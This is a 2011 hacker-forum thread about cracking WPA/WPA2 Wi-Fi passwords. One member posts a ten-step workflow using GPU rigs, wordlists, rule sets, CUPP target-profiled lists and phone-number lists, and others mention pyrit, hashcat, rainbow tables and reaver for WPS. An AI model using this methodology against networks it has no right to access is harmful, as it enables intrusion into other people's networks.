Jump to content


Photo
- - - - -

Anyone tried WPA dictionaries with success


  • Please log in to reply
10 replies to this topic

#1 bardolph

bardolph

    DDP Fan club member

  • Members
  • 50 posts
  • Gender:Male

Posted 17 September 2011 - 01:42 PM

without preincluding the password of course

#2 TheFunk

TheFunk

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 29 September 2011 - 10:29 AM

Without preincluding the password I've never had any success with WPA dictionaries. Not to mention the fact that if someone is smart enough to use WPA encryption they're more than likely also smart enough to not use a dictionary word as their password. I've been looking into bruteforce methods recently and while there don't seem to be very many promising options, you might want to look into something called pyrit. It utilizes your GPU, which, assuming you have an alright graphics card, means you just might be able to crack that password afterall.

Edited by TheFunk, 29 September 2011 - 10:31 AM.


#3 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 29 September 2011 - 02:42 PM

WPA's becoming standard, man. Don't count it as a sign of smarts.

#4 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 30 September 2011 - 11:42 AM

Even with hardware acceleration, WPA/WPA2 is a bitch for bruteforcing. When was the last time anyone in here has brute-forced something over 9 chars (even with CUDA/ATI STREAM acceleration? I've cracked a 9 char MD5 hash once. It was all alpha and MD5 w/o a salt is nothing compared to WPA/WPA2 keys. Hardware acceleration on consumer products, like video cards, is best used for mangling wordlists for WPA/WPA2.

I've been able to crack a few WPA keys. I usually use this method and systems with the following hardware/software:

Machine 1: Windows 7 64-bit
Q9550 Quad core oc'd to 3.7Ghz
x2 Radeon 5850's
8GB DDR3
Elcomsoft Wireless Security Auditor (Supports ATI STREAM Acceleration as well as CUDA)
Elcomsoft Distributed Cracking Tool (CUDA and ATI STREAM Support)

Machine 2 iMac: Mac OSX
3.2 Ghz Core2 Duo
8GB DDR3
Aircrack-ng and jtr (john the ripper using a custom ruleset I made just for cracking WPA)
CUPP = a tool written in Python to make custom password lists

Machine 3 Windows 7:
Core i7 @ 4.2Ghz
x2 Asus GTX 460's
8GB DDR3
Elcomsoft Wireless Security Auditor
Elcomsoft Distributed Cracking Tool (cuda and STREAM support)

1) Use huge wordlist of dictionary words
2) Brute for 10 numerics
3) Max out rules on Elcomsoft Wireless Security Auditor with small wordlist
4) small wordlist with custom jtr rules
5) Medium wordlist with minimal rules on Elcmsoft WiFi Security Auditor
6) Medium wordlist with custom jtr rules
7) 1337 speak and other custom dicts not covered in Elcomsoft or jtr rulesets
8) Collect information on target and use CUPP to create some custom word lists
9) Forget about computers for a while, because at this point, with advanced rules, and huge dictionaries, all systems are busy for a few days.
10) After a day or two of nothing on larger lists with large rule sets, I usually just stop. This kinda stress puts a lot of wear on systems.

EDIT: I also make a custom list, using passwords pro, of every phone number with the local area code.

Edited by tekio, 30 September 2011 - 11:45 AM.


#5 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 30 September 2011 - 01:23 PM

Even with hardware acceleration, WPA/WPA2 is a bitch for bruteforcing. When was the last time anyone in here has brute-forced something over 9 chars (even with CUDA/ATI STREAM acceleration? I've cracked a 9 char MD5 hash once. It was all alpha and MD5 w/o a salt is nothing compared to WPA/WPA2 keys. Hardware acceleration on consumer products, like video cards, is best used for mangling wordlists for WPA/WPA2.

I've been able to crack a few WPA keys. I usually use this method and systems with the following hardware/software:

Machine 1: Windows 7 64-bit
Q9550 Quad core oc'd to 3.7Ghz
x2 Radeon 5850's
8GB DDR3
Elcomsoft Wireless Security Auditor (Supports ATI STREAM Acceleration as well as CUDA)
Elcomsoft Distributed Cracking Tool (CUDA and ATI STREAM Support)

Machine 2 iMac: Mac OSX
3.2 Ghz Core2 Duo
8GB DDR3
Aircrack-ng and jtr (john the ripper using a custom ruleset I made just for cracking WPA)
CUPP = a tool written in Python to make custom password lists

Machine 3 Windows 7:
Core i7 @ 4.2Ghz
x2 Asus GTX 460's
8GB DDR3
Elcomsoft Wireless Security Auditor
Elcomsoft Distributed Cracking Tool (cuda and STREAM support)

1) Use huge wordlist of dictionary words
2) Brute for 10 numerics
3) Max out rules on Elcomsoft Wireless Security Auditor with small wordlist
4) small wordlist with custom jtr rules
5) Medium wordlist with minimal rules on Elcmsoft WiFi Security Auditor
6) Medium wordlist with custom jtr rules
7) 1337 speak and other custom dicts not covered in Elcomsoft or jtr rulesets
8) Collect information on target and use CUPP to create some custom word lists
9) Forget about computers for a while, because at this point, with advanced rules, and huge dictionaries, all systems are busy for a few days.
10) After a day or two of nothing on larger lists with large rule sets, I usually just stop. This kinda stress puts a lot of wear on systems.

EDIT: I also make a custom list, using passwords pro, of every phone number with the local area code.



im jelly of your hardware

Posted Image

#6 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 30 September 2011 - 06:29 PM

Your best shot is if they used their phone number and you have a goddamned titan PC like tekio. (Personally I'm partial to CUDA, but it's your call, and I'm certainly not one to complain if you've got a system decked out so beautifully, let alone three!)

#7 TheFunk

TheFunk

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 02 October 2011 - 04:32 PM

Even with hardware acceleration, WPA/WPA2 is a bitch for bruteforcing. When was the last time anyone in here has brute-forced something over 9 chars (even with CUDA/ATI STREAM acceleration? I've cracked a 9 char MD5 hash once. It was all alpha and MD5 w/o a salt is nothing compared to WPA/WPA2 keys. Hardware acceleration on consumer products, like video cards, is best used for mangling wordlists for WPA/WPA2.


1- You have sweet hardware.

2- Have you tried rainbow tables for MD5? I have a set of tables that work really well, they only go up to 9 characters like you managed to crack, but still. I believe the tables are alpha-numeric.

To the original poster, I occasionally toy around with oclhashcat, which allows for hybrid cracking (use of wordlist and bruteforcing together) it's possible that you might be able to use hashcat to crack WPA passwords. I'm not sure though, I'm not entirely familiar with the software yet.

#8 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 02 October 2011 - 05:21 PM


Even with hardware acceleration, WPA/WPA2 is a bitch for bruteforcing. When was the last time anyone in here has brute-forced something over 9 chars (even with CUDA/ATI STREAM acceleration? I've cracked a 9 char MD5 hash once. It was all alpha and MD5 w/o a salt is nothing compared to WPA/WPA2 keys. Hardware acceleration on consumer products, like video cards, is best used for mangling wordlists for WPA/WPA2.


1- You have sweet hardware.

2- Have you tried rainbow tables for MD5? I have a set of tables that work really well, they only go up to 9 characters like you managed to crack, but still. I believe the tables are alpha-numeric.

1) thank you. I'm probably a little older than most in here, and have a career. So, I buy some toys since I work my ass off (albeit from home mostly) 6 days a week and am on call 24/7.

2) Yes, I do. I have a set of 9char alpha with a space and they are huge... I've got quite a few tables... Earlier their was a topic in here about Rainbow table trading. It motivated me to stock up on them. :)

#9 Castlewall

Castlewall

    Will I break 10 posts?

  • Members
  • 5 posts
  • Country:
  • Gender:Male

Posted 06 January 2012 - 11:50 PM

We can say, that's not easy for beginners, am i right? :dry:

#10 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 28 January 2012 - 12:40 AM

We can say, that's not easy for beginners, am i right? :dry:



wrapping your brain around rainbow tables can be tough at first.
http://en.wikipedia....i/Rainbow_table




_THIS_ is easy:
http://code.google.com/p/reaver-wps/

attacking wps is easyer than cracking wep imho.

#11 digitalchameleon

digitalchameleon

    Will I break 10 posts?

  • Members
  • 9 posts
  • Country:
  • Gender:Male

Posted 13 March 2012 - 12:33 PM

True, but not every AP is vulnerable to WPS cracking. I have had limited success with WPA dictionary attacks. Once by brute forcing an 8 digit numeric key, but it took too long.




BinRev is hosted by the great people at Lunarpages!